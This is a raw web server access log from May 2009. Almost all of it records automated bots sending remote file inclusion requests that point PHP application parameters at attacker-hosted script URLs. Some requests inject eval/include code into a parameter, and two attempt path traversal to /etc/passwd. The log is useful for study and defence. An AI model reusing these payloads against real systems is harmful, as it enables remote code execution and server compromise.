218.185.20.88 - - [29/May/2009:21:10:54 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:10:54 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:10:54 -0500] "GET /logs/access_log.1241654400//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:10:54 -0500] "GET /logs/access_log.1242172800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
65.55.106.211 - - [29/May/2009:21:11:08 -0500] "GET /logs/access_log.1159920000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.185.20.88 - - [29/May/2009:21:13:58 -0500] "GET /logs/access_log.1241740800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:13:58 -0500] "GET /logs/access_log.1240444800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
213.203.223.93 - - [29/May/2009:21:14:48 -0500] "GET /logs/access_log.1238630400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:21:14:48 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
213.203.223.93 - - [29/May/2009:21:14:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.17.162.28 - - [29/May/2009:21:14:57 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:14:57 -0500] "GET /index.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
80.237.146.58 - - [29/May/2009:21:15:33 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
80.237.146.58 - - [29/May/2009:21:15:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
211.172.225.50 - - [29/May/2009:21:15:50 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
211.172.225.50 - - [29/May/2009:21:15:50 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
65.55.106.172 - - [29/May/2009:21:16:38 -0500] "GET /logs/access_log.1148428800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.237.146.58 - - [29/May/2009:21:17:37 -0500] "GET /logs/access_log.1238630400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:21:17:37 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:21:17:37 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
85.17.162.28 - - [29/May/2009:21:17:38 -0500] "GET ////?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3247 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:17:39 -0500] "GET /logs////?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://208.98.22.241/id.txt??? HTTP/1.1" 200 191356 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:17:40 -0500] "GET ////?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3247 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:17:42 -0500] "GET /logs////?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://208.98.22.241/id.txt??? HTTP/1.1" 200 191356 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:18:10 -0500] "GET ////?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3247 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:18:11 -0500] "GET /logs////?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://208.98.22.241/id.txt??? HTTP/1.1" 200 191356 "-""libwww-perl/5.805"
195.228.45.60 - - [29/May/2009:21:18:20 -0500] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
195.228.45.60 - - [29/May/2009:21:18:20 -0500] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
218.185.20.88 - - [29/May/2009:21:27:13 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:27:13 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:27:13 -0500] "GET /logs/access_log.1241654400//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:27:13 -0500] "GET /logs/access_log.1242172800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:28:38 -0500] "GET /logs/access_log.1241740800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:28:53 -0500] "GET /logs/access_log.1240444800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:02 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:02 -0500] "GET //?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:02 -0500] "GET /logs/access_log.1231372800//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:03 -0500] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:17 -0500] "GET //?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:17 -0500] "GET /logs/access_log.1231372800//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:17 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:35:18 -0500] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
87.230.85.142 - - [29/May/2009:21:35:40 -0500] "GET //?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.230.85.142 - - [29/May/2009:21:35:40 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.230.85.142 - - [29/May/2009:21:35:40 -0500] "GET /logs/access_log.1231372800//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.230.85.142 - - [29/May/2009:21:35:41 -0500] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
121.0.141.241 - - [29/May/2009:21:37:45 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
121.0.141.241 - - [29/May/2009:21:37:46 -0500] "GET //skin/zero_vote/error.php?dir=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.214.83.196 - - [29/May/2009:21:39:14 -0500] "GET /logs/access_log.1231372800//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:14 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:14 -0500] "GET //?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:16 -0500] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:41 -0500] "GET //?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:41 -0500] "GET /logs/access_log.1231372800//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:41 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:21:39:42 -0500] "GET /logs//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
65.55.106.196 - - [29/May/2009:21:40:38 -0500] "GET /logs/access_log.1232150400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [29/May/2009:21:42:25 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:25 -0500] "GET //include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:27 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:27 -0500] "GET /logs/access_log.1229644800//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:39 -0500] "GET //include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:39 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:39 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:42:39 -0500] "GET /logs/index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:42:39 -0500] "GET /index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:21:42:44 -0500] "GET /logs/access_log.1229644800//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:43:06 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:43:06 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:43:06 -0500] "GET //include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:21:43:09 -0500] "GET /logs/access_log.1229644800//include/admin.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:21:44:45 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
80.237.146.58 - - [29/May/2009:21:44:45 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
72.18.148.82 - - [29/May/2009:21:45:54 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:21:45:54 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:21:45:54 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:21:45:58 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:47:32 -0500] "GET /logs/access_log.1239667200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:47:32 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:21:47:32 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:48:58 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:48:58 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 324 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:48:58 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:48:58 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:21:49:30 -0500] "GET /logs/access_log.1242518400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:21:49:30 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:21:49:30 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:49:31 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:49:31 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 324 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:49:31 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:49:31 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:50:08 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 324 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:50:08 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:50:08 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.234.63.110 - - [29/May/2009:21:50:08 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.souzamolduras.com.br/fotos_perfis/help/copyright? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:21:50:24 -0500] "GET /logs/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:21:50:24 -0500] "GET /errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:21:50:24 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:21:50:46 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:21:50:46 -0500] "GET /logs/access_log.1240358400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:21:50:46 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.119.154.129 - - [29/May/2009:21:51:41 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:21:51:41 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:21:51:43 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
85.119.154.129 - - [29/May/2009:21:51:43 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
203.151.233.72 - - [29/May/2009:21:53:07 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:21:53:07 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:21:53:07 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.151.233.72 - - [29/May/2009:21:53:07 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:21:53:41 -0500] "GET /logs/access_log.1240358400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:21:53:41 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.32.195.2 - - [29/May/2009:21:53:41 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.172.225.50 - - [29/May/2009:21:57:10 -0500] "GET /logs/errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
211.172.225.50 - - [29/May/2009:21:57:10 -0500] "GET /errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.212.165.114 - - [29/May/2009:21:57:18 -0500] "GET /logs/access_log.1239926400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.230.85.142 - - [29/May/2009:21:58:14 -0500] "GET /logs/access_log.1231891200//?_zb_path=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.237.146.58 - - [29/May/2009:21:59:53 -0500] "GET /logs/access_log.1240012800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:21:59:54 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.237.146.58 - - [29/May/2009:21:59:54 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.185.20.88 - - [29/May/2009:22:00:30 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:22:00:30 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.185.20.88 - - [29/May/2009:22:00:30 -0500] "GET /logs/access_log.1239667200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
72.18.148.82 - - [29/May/2009:22:01:26 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.25.133.199 - - [29/May/2009:22:04:18 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
209.25.133.199 - - [29/May/2009:22:04:18 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.runway34.ch/cms/r0x.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
203.151.233.72 - - [29/May/2009:22:04:23 -0500] "GET /errors.php?error=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
